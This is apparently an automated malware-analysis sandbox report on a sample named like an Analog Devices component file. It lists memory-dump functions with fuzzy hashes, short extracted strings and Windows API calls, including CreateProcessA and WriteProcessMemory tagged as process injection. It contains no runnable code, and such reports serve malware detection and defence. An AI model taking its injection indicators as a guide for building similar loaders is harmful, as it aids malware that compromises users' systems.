Instruction Fuzzy Hash: 4991D3B4E012198FDB08CFA9C884AEEFBB6BF88310F14952AD515BB364D7349941CF54

Function 0B246018 Relevance: 2.7, Strings: 2, Instructions: 165COMMON

Download Yara Rule

Strings

or, xrefs: 0B24606E
\~$, xrefs: 0B246138

Memory Dump Source

Source File: 00000000.00000002.1857064657.000000000B240000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b240000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID: \~$$or
API String ID: 0-2796768027
Opcode ID: 31c77d46441652bcd7dfd2e5ab67f7c92fff57841bc84f81934af99aa9cf5df9
Instruction ID: 12ee12bdb5ed76dd7f499d790da9b0f1ae7503070804b8ecf5b3c68c0343bbc1
Opcode Fuzzy Hash: 31c77d46441652bcd7dfd2e5ab67f7c92fff57841bc84f81934af99aa9cf5df9
Instruction Fuzzy Hash: 306145B4E25219DFCB08CFA6D5815AEFBF2FF89740F10902AD415A7264D7789A41CF50

Function 07B58DC9 Relevance: 1.5, Strings: 1, Instructions: 281COMMON

Download Yara Rule

Strings

xD1, xrefs: 07B58E11

Memory Dump Source

Source File: 00000000.00000002.1854631461.0000000007B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b50000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID: xD1
API String ID: 0-1205718373
Opcode ID: 477ffc8c66a55158bbea9d4c8607c20cf2fdf9e9e151663fc16fc6394ea6b938
Instruction ID: 070976ea01adddc26e93507eb5b92c29c0b4c9ff06a19389b98b62b7897b1ec4
Opcode Fuzzy Hash: 477ffc8c66a55158bbea9d4c8607c20cf2fdf9e9e151663fc16fc6394ea6b938
Instruction Fuzzy Hash: 37C15CB1E00215DFEF14CFA5C980799BBB2EF88304F14C5A9D849AB255EB30A985CF91

Function 0B247990 Relevance: 1.5, Strings: 1, Instructions: 270COMMON

Download Yara Rule

Strings

?w=>, xrefs: 0B247C5C

Memory Dump Source

Source File: 00000000.00000002.1857064657.000000000B240000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b240000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID: ?w=>
API String ID: 0-1933253675
Opcode ID: ef315383164faed376b58a5ed24b3bb28243207328b6aa01013d5280dd144012
Instruction ID: 6029e407787a3a15cbe9cab39b1f8dd04e64e462f2010cb105672771fd4df4d6
Opcode Fuzzy Hash: ef315383164faed376b58a5ed24b3bb28243207328b6aa01013d5280dd144012
Instruction Fuzzy Hash: 21B118B0D15269DFDB18CFA6D9805DEFBB2FF88300F10952AD425AB264DB749A06CF14

Function 0B245638 Relevance: 1.5, Strings: 1, Instructions: 246COMMON

Download Yara Rule

Strings

5{, xrefs: 0B245822

Memory Dump Source

Source File: 00000000.00000002.1857064657.000000000B240000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b240000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID: 5{
API String ID: 0-2291050889
Opcode ID: 8a0f5ac5ca07fecd64f7a181eb8439a351458012f2e0120cf22274f485b463ac
Instruction ID: b1341da4ff82b6224ff64d5b0f37b9f88c00135ef041df3dc6cf625efb0685d6
Opcode Fuzzy Hash: 8a0f5ac5ca07fecd64f7a181eb8439a351458012f2e0120cf22274f485b463ac
Instruction Fuzzy Hash: B8A16D74E11609DFCB08DFA9D5844AEBBF2FF88300F20846AD455AB368DB349A05CF95

Function 0B2470E0 Relevance: 1.5, Strings: 1, Instructions: 208COMMON

Download Yara Rule

Strings

j4$y, xrefs: 0B2472F6

Memory Dump Source

Source File: 00000000.00000002.1857064657.000000000B240000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b240000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID: j4$y
API String ID: 0-2391584009
Opcode ID: 3604782043a24b897254a2c4fd63f22215b957cce6217dd68d42f1f7a666a10b
Instruction ID: 65510ad24338c2f7d5f022e89d24202bbbed3f6bfefbc6bdd9dc853ae4608cf8
Opcode Fuzzy Hash: 3604782043a24b897254a2c4fd63f22215b957cce6217dd68d42f1f7a666a10b
Instruction Fuzzy Hash: 0E81F871D15209DFCB08CFE6D98099EFBB2EF89310F10942AE42ABB664D7749942CF54

Function 01330870 Relevance: 1.3, Strings: 1, Instructions: 91COMMON

Download Yara Rule

Strings

|4_b, xrefs: 01330969

Memory Dump Source

Source File: 00000000.00000002.1836309965.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1330000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID: |4_b
API String ID: 0-3176189083
Opcode ID: 9e1409eb69ad9b5752df172d35c6adf59ee05d88147ae2a164fcc9b07c9028c6
Instruction ID: f109f99ff6695fc9fb963f4400096c355dcbc575070d29fe2f5f36362d6e26e9
Opcode Fuzzy Hash: 9e1409eb69ad9b5752df172d35c6adf59ee05d88147ae2a164fcc9b07c9028c6
Instruction Fuzzy Hash: F141E8B1E056588FEB58CFAAD85079EFBB3BFC9300F14C1AAD508A7265DB304A458F51

Function 09CD4BE0 Relevance: .6, Instructions: 606COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1856859677.0000000009CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09CD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9cd0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aedcc62373e1e038097e638aab184d87edc73110bec475f7dddc34bef0112439
Instruction ID: 951fcc783bb0757fe8c848b40bec1e79bcf8626cffa6cce3b57d6db695571576
Opcode Fuzzy Hash: aedcc62373e1e038097e638aab184d87edc73110bec475f7dddc34bef0112439
Instruction Fuzzy Hash: 4B328B70B022449FDB18DF69D554BAEBBF6AF89300F148469E245DB3A1CB74EE01CB91

Function 0B242A3A Relevance: .3, Instructions: 324COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1857064657.000000000B240000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b240000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b1a37d3c87b6b4105fea2cab3044dd326c04d20ba202ef574ecf99ab3560d5e2
Instruction ID: e08801418138f57805c11ff87820fc52d37ed24bc432ef16ae52c2e543deb032
Opcode Fuzzy Hash: b1a37d3c87b6b4105fea2cab3044dd326c04d20ba202ef574ecf99ab3560d5e2
Instruction Fuzzy Hash: E6D15F70D2421ADFCB08CF96D5814AEFBB2FF49300F14D45AE816AB254D734AA86CF95

Function 0B245A78 Relevance: .2, Instructions: 152COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1857064657.000000000B240000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b240000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67a9df25eba928709a244e4b1295563f4707ed45491dd6a6e23fbbd387f5c04e
Instruction ID: 2b51057bdf56a48ccb743bc59965349b43378071d53d6e3bbb02277b12ac5f09
Opcode Fuzzy Hash: 67a9df25eba928709a244e4b1295563f4707ed45491dd6a6e23fbbd387f5c04e
Instruction Fuzzy Hash: F45138B4E1121A9FCB08CFA5D9854EEFBF2FF89250F14D42AD426E7264D7789A008F50

Function 01331AD8 Relevance: .2, Instructions: 151COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1836309965.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1330000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 44214e037527a59043e3fb34b58131bacdf909c8acc8fbe63b70a670b212f539
Instruction ID: bb8416e8630931af34a52798fc84b541c25411ab37ad2f8562fc0f7fda3cb2f9
Opcode Fuzzy Hash: 44214e037527a59043e3fb34b58131bacdf909c8acc8fbe63b70a670b212f539
Instruction Fuzzy Hash: 4151FAB4E056098FDB08CFAAC5505AEFBF2FFC8310F14D46AD419A7254E7349A418F99

Function 0B2412D8 Relevance: .1, Instructions: 121COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1857064657.000000000B240000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b240000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 842e7b3a0a6944600664ae1098c6c9e1b414ba7d9e40bdc7b7327d9972ec8e06
Instruction ID: 3e2a751e9e70d4f6498edc8b5871bd0671f3eb7696cb35f52f0bb34eba904d12
Opcode Fuzzy Hash: 842e7b3a0a6944600664ae1098c6c9e1b414ba7d9e40bdc7b7327d9972ec8e06
Instruction Fuzzy Hash: 074132B4E14219CFCB08CFAAC9806AEFFF2AB88311F14D06AD419B7654D7348981CF65

Function 01332500 Relevance: .1, Instructions: 86COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1836309965.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1330000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1c6dd58b216285eb65b2300e881d4c7824c8e2eac6426056210d37e0a261e40d
Instruction ID: 15f6171662fcf086a4f9be7e25cb7b0b557c71c4d9af4d43a6b4f968c7232d12
Opcode Fuzzy Hash: 1c6dd58b216285eb65b2300e881d4c7824c8e2eac6426056210d37e0a261e40d
Instruction Fuzzy Hash: 233117B1E016188FDB18CFAAD9546DEBBF2BFC9311F14C0A9D409AB264DB355A85CF40

Function 0B241C90 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1857064657.000000000B240000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b240000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 387573a6ff5732b2cf0a5b0fbd01ba27ccf36c4a1dba07ae4dab95fde0b19123
Instruction ID: def1372e6f61bf04052b5a17f0502a4220723bf659648775867b41bc3caf382f
Opcode Fuzzy Hash: 387573a6ff5732b2cf0a5b0fbd01ba27ccf36c4a1dba07ae4dab95fde0b19123
Instruction Fuzzy Hash: 11310671E01258DBDB18CFAAD94469EBBB7AFC9311F14C0AAE409A7364DB315A81CF41

Function 0B240040 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1857064657.000000000B240000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b240000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12863352966d71ec75afaf8d1cdc702696d89c87934eb25631434486279fde42
Instruction ID: 860aef81a5319f687d7d3c9075331898e98717d7df55bc6f0756ac331ab0d4aa
Opcode Fuzzy Hash: 12863352966d71ec75afaf8d1cdc702696d89c87934eb25631434486279fde42
Instruction Fuzzy Hash: EB21EC71E106189BDB58CFABD84479EFBF7AFC8200F04C57AD51CA6224EB3019458F51

Function 0B24E8BD Relevance: 11.4, Strings: 9, Instructions: 112
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

p)6, xrefs: 0B24EB0A
x(6, xrefs: 0B24E868
p)6, xrefs: 0B24EAF7
H+6, xrefs: 0B24EBC0
\n7L, xrefs: 0B24EA1D
\n7L, xrefs: 0B24E8BD
x(6, xrefs: 0B24EA38
p)6, xrefs: 0B24EBAA
p)6, xrefs: 0B24E87B

Memory Dump Source

Source File: 00000000.00000002.1857064657.000000000B240000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b240000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID: H+6$\n7L$\n7L$p)6$p)6$p)6$p)6$x(6$x(6
API String ID: 0-848065714
Opcode ID: acb97b8065209155b7414b890ae63b575431602809db87796fda5d5d538cd9e1
Instruction ID: 0c11e171bd2a43287b39293c3a2ac889471ec78d24ac5e818727689c199a2ad6
Opcode Fuzzy Hash: acb97b8065209155b7414b890ae63b575431602809db87796fda5d5d538cd9e1
Instruction Fuzzy Hash: 92514B78A102098FDB18DF64D9846AE7BFAFB89300F11C159D429E7769DB305D81CF62

Function 0B24E775 Relevance: 8.8, Strings: 7, Instructions: 84
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

x(6, xrefs: 0B24E868
H+6, xrefs: 0B24EBC0
\n7L, xrefs: 0B24EA1D
H+6, xrefs: 0B24E77A
x(6, xrefs: 0B24EA38
p)6, xrefs: 0B24EBAA
p)6, xrefs: 0B24E87B

Memory Dump Source

Source File: 00000000.00000002.1857064657.000000000B240000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b240000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID: H+6$H+6$\n7L$p)6$p)6$x(6$x(6
API String ID: 0-3094781628
Opcode ID: 3f198da22766cbdaedc15692d5d700a7954d997eedecbf0883ed96d4a7e587b4
Instruction ID: 3b944940b661963ee267b2db0361b696ae415993a53fcd7b842969a23636700d
Opcode Fuzzy Hash: 3f198da22766cbdaedc15692d5d700a7954d997eedecbf0883ed96d4a7e587b4
Instruction Fuzzy Hash: C4313D78A10119CFDB18DF24D984AAE7BBAFB89300F11C554D429E7759DB305D81CF62

Function 051F8E98 Relevance: 4.1, Strings: 3, Instructions: 307
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(jq, xrefs: 051FD132
Hjq, xrefs: 051FD2DE
Hjq, xrefs: 051FD1F0

Memory Dump Source

Source File: 00000000.00000002.1844686344.00000000051F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_51f0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID: (jq$Hjq$Hjq
API String ID: 0-2816841513
Opcode ID: 16f4559ce0ff84b7488efed25effea6f1b4a11fd1cf928aa34151d0bb1e2653d
Instruction ID: 2e448c4b3668d748aa7cf8938cbfddcc821073fe263e4da0b71200d4c9772d5a
Opcode Fuzzy Hash: 16f4559ce0ff84b7488efed25effea6f1b4a11fd1cf928aa34151d0bb1e2653d
Instruction Fuzzy Hash: 2AA1B170B042489FCB14EFA9D444AAF7BF6EF84310F14845AE645E7392CB389D06CBA5

Function 051FE9C0 Relevance: 2.7, Strings: 2, Instructions: 215
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Hjq, xrefs: 051FEAEE
Hjq, xrefs: 051FEA88

Memory Dump Source

Source File: 00000000.00000002.1844686344.00000000051F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_51f0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID: Hjq$Hjq
API String ID: 0-2395847853
Opcode ID: d8b1e1fc55a69061ee045e3353ec4110b5b1b97056dddd99aeba4fc668a18c83
Instruction ID: 9851199e4049865fa070beb54d5f72ded53847808b8844972ee5c452f2bdad2f
Opcode Fuzzy Hash: d8b1e1fc55a69061ee045e3353ec4110b5b1b97056dddd99aeba4fc668a18c83
Instruction Fuzzy Hash: 35815B70E002599FCF54DFA9C8946AEBFF6FF89300F14852AE509AB361DB345905CB91

Function 051FCFF7 Relevance: 2.7, Strings: 2, Instructions: 206
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(jq, xrefs: 051FD132
Hjq, xrefs: 051FD1F0

Memory Dump Source

Source File: 00000000.00000002.1844686344.00000000051F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_51f0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID: (jq$Hjq
API String ID: 0-2151573235
Opcode ID: 35e4562cd73faca2ef4783063a729b0699addcc2f27babccae58afdba1c811ce
Instruction ID: 8124ad3a7b92eebee87d8dbb3c8cf2836923f1c1d8e8bb3538bdf22d93c0fa1b
Opcode Fuzzy Hash: 35e4562cd73faca2ef4783063a729b0699addcc2f27babccae58afdba1c811ce
Instruction Fuzzy Hash: 91611370B042459FCB18EBB8D4546BF7BE7AFC4310B14846AE60AD7392CF349C0287A5

Function 051FD05B Relevance: 2.7, Strings: 2, Instructions: 157COMMON

Download Yara Rule

Strings

(jq, xrefs: 051FD132
Hjq, xrefs: 051FD1F0

Memory Dump Source

Source File: 00000000.00000002.1844686344.00000000051F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_51f0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID: (jq$Hjq
API String ID: 0-2151573235
Opcode ID: 151d2a4ccd66ccae68ee71bb30266524219d51051c6feddb50eacc0b34b34bc0
Instruction ID: f67c6b5b212f2546d46b7eb025997dc0e1899fef33321cbe63d49222c54f90a2
Opcode Fuzzy Hash: 151d2a4ccd66ccae68ee71bb30266524219d51051c6feddb50eacc0b34b34bc0
Instruction Fuzzy Hash: D2410770B042589FCB58ABB9985457F3FA7AFC4350714846AE706D7396DF388C0783A5

Function 051F8EA8 Relevance: 2.7, Strings: 2, Instructions: 157COMMON

Download Yara Rule

Strings

Hjq, xrefs: 051FCEA3
Hjq, xrefs: 051FCEFA

Memory Dump Source

Source File: 00000000.00000002.1844686344.00000000051F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_51f0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID: Hjq$Hjq
API String ID: 0-2395847853
Opcode ID: 0f80dbdebf9803739c74e567e16ae993dcbaf5c51ae3e3f1120c86016b06fee4
Instruction ID: 01a175f1fa39c5d78516394b142a65c056f5e69f65a16be71f33c41a36090892
Opcode Fuzzy Hash: 0f80dbdebf9803739c74e567e16ae993dcbaf5c51ae3e3f1120c86016b06fee4
Instruction Fuzzy Hash: F9517071A042089FCB14DFA9C454AAEBFF6FF85310F14842AE615E7341DB389D05CB91

Function 051F8EF0 Relevance: 2.6, Strings: 2, Instructions: 146COMMON

Download Yara Rule

Strings

(jq, xrefs: 051FD132
Hjq, xrefs: 051FD1F0

Memory Dump Source

Source File: 00000000.00000002.1844686344.00000000051F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_51f0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID: (jq$Hjq
API String ID: 0-2151573235
Opcode ID: 13cc7fc4737b68b28e84318d7a41ec23ac66248f22c7ed469ed7ab6a732d5fa3
Instruction ID: e28d424531e6a4a7e98c197459bcf4d848709ac48a6a2ec8a055db9d2a22c56f
Opcode Fuzzy Hash: 13cc7fc4737b68b28e84318d7a41ec23ac66248f22c7ed469ed7ab6a732d5fa3
Instruction Fuzzy Hash: C54124B0B041189FCB58ABF9845997F7EA7EBC4340B15846AE34A97392CF348C0683A5

Function 0B24E663 Relevance: 2.5, Strings: 2, Instructions: 37COMMON

Download Yara Rule

Strings

p)6, xrefs: 0B24EC12
x(6, xrefs: 0B24ECB7

Memory Dump Source

Source File: 00000000.00000002.1857064657.000000000B240000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b240000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID: p)6$x(6
API String ID: 0-1081823384
Opcode ID: 67b1cfb3dbfc67e0e5f95f9624be1f62e1a24d941ac63ad4e4444631472b2307
Instruction ID: 683f2a224c21b7752f2650fe48c26374b0295e11bd713ba62bff0c17edcccc1e
Opcode Fuzzy Hash: 67b1cfb3dbfc67e0e5f95f9624be1f62e1a24d941ac63ad4e4444631472b2307
Instruction Fuzzy Hash: 10017C749542488FDB08DF98D9845AD7BFDFB8A300F119619E422EB3A8DB305C42CF41

Function 09CD15E4 Relevance: 1.7, APIs: 1, Instructions: 245processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 09CD1826

Memory Dump Source

Source File: 00000000.00000002.1856859677.0000000009CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09CD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9cd0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: fe339dab5de07d6a4f2c70d65d255b295ef0a18aef79b53be66d010e06163e95
Instruction ID: cd1ba405960688e15e8d20fcde502b170449ae86aae25c18fe5986b54116ab86
Opcode Fuzzy Hash: fe339dab5de07d6a4f2c70d65d255b295ef0a18aef79b53be66d010e06163e95
Instruction Fuzzy Hash: 67A17C71D052198FDB28CF68DD41BEDBBB2FF48310F198169E908A7250DB749A85CF91

Function 09CD15F0 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 09CD1826

Memory Dump Source

Source File: 00000000.00000002.1856859677.0000000009CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09CD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9cd0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 19eca272a23122f3f4c7db3bc864581d5b0cf460c7b6db74f31ccaf1b040a5e0
Instruction ID: 5899f4d8d0fc661cc43ea3aef87447b3fb90bbd47ef56207907dd67298db6acd
Opcode Fuzzy Hash: 19eca272a23122f3f4c7db3bc864581d5b0cf460c7b6db74f31ccaf1b040a5e0
Instruction Fuzzy Hash: 26918B71D052198FDB28CFA8DD41BEDBBB2FF48310F198169E908A7250DB749A81CF91

Function 0133AF9D Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 0133B059

Memory Dump Source

Source File: 00000000.00000002.1836309965.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1330000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 910b1ed015dfe48678b058c33db9c9ce7c4b6840d08021a0f02316a5e577127e
Instruction ID: d2045c2ca0195f474a8a6d1ce8015ba881319589d6bd2f220331676fbda3d366
Opcode Fuzzy Hash: 910b1ed015dfe48678b058c33db9c9ce7c4b6840d08021a0f02316a5e577127e
Instruction Fuzzy Hash: DE41CFB1C00719CADB24CFA9C984BDEFBB6BF88308F20815AD418AB255DB756945CF90

Function 01339A78 Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 0133B059

Memory Dump Source

Source File: 00000000.00000002.1836309965.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1330000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 358d27c87b896289af1ed2d3dce8d8b4a30fe8bc6007b754de751584f497746a
Instruction ID: 7779d268918654299fd57c53ee232cb00f5cb80b08b0372ddfc8e5fcda174552
Opcode Fuzzy Hash: 358d27c87b896289af1ed2d3dce8d8b4a30fe8bc6007b754de751584f497746a
Instruction Fuzzy Hash: D241DFB0C0071DCBDB24CFA9C984B9EFBB5BF88308F20806AD418AB255DB756945CF90

Function 07B59700 Relevance: 1.6, APIs: 1, Instructions: 85COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1854631461.0000000007B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b50000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID: CreateFromIconResource
String ID:
API String ID: 3668623891-0
Opcode ID: e0bc0e71c13710c66e6c299a308a4da92a85ee69a9033b989a81e9861f8aa34f
Instruction ID: b8ae5e82c727e19019a743679c8620f94dc0033153691d5c0f6d37c21fe1d555
Opcode Fuzzy Hash: e0bc0e71c13710c66e6c299a308a4da92a85ee69a9033b989a81e9861f8aa34f
Instruction Fuzzy Hash: F3319AB2900349DFDB11CFA9C840AEEBFF8EF49310F14849AE914A7221C335A950DFA0

Function 07B57B90 Relevance: 1.6, APIs: 1, Instructions: 72COMMON

Download Yara Rule

APIs

DrawTextExW.USER32(?,?,?,?,?,?), ref: 07B57C2F

Memory Dump Source

Source File: 00000000.00000002.1854631461.0000000007B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b50000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID: DrawText
String ID:
API String ID: 2175133113-0
Opcode ID: 78a9d7f383fa990737a8b2644cb2e3480c350421da9a92306362bedadb60438c
Instruction ID: fe2b8fd52930ad14d98e4ba19fa72007be314405af46794eba403a443e101e35
Opcode Fuzzy Hash: 78a9d7f383fa990737a8b2644cb2e3480c350421da9a92306362bedadb60438c
Instruction Fuzzy Hash: 0631D2B59002099FDB10CF9AD884A9EBBF5FB48320F24846AE815A7310D774A940CFA0

Function 09CD1361 Relevance: 1.6, APIs: 1, Instructions: 71injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 09CD13F8

Memory Dump Source

Source File: 00000000.00000002.1856859677.0000000009CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09CD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9cd0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 2f2fbf790aef8617cac106ad93ef05489ca5c40321795792d88ea016de8e71ed
Instruction ID: b488ea7c452da57e6d2841d112cf25e9f0a5e4a01471f000ed7487134f284c86
Opcode Fuzzy Hash: 2f2fbf790aef8617cac106ad93ef05489ca5c40321795792d88ea016de8e71ed
Instruction Fuzzy Hash: DC2135B1D003498FCB14CFA9C881BEEBBF5FF48310F14842AE919A7250C7789951DB60

Function 09CD1368 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 09CD13F8

Memory Dump Source

Source File: 00000000.00000002.1856859677.0000000009CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09CD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9cd0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 80fbd47b7ce1e3edd614abad0aa2a3611b6be94e689a8b4b3be72a6d2e524cee
Instruction ID: 17a796e6f7fe2f8730f28f50c786d4bca3cbf82b1f0b4f02c60c707962de8fb2
Opcode Fuzzy Hash: 80fbd47b7ce1e3edd614abad0aa2a3611b6be94e689a8b4b3be72a6d2e524cee
Instruction Fuzzy Hash: F62128B19003499FDB10CFA9C981BDEBBF5FF48310F148429E519A7240C7789950DB60

Function 07B57B98 Relevance: 1.6, APIs: 1, Instructions: 69COMMON

Download Yara Rule

APIs

DrawTextExW.USER32(?,?,?,?,?,?), ref: 07B57C2F

Memory Dump Source

Source File: 00000000.00000002.1854631461.0000000007B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B50000, based on PE: false

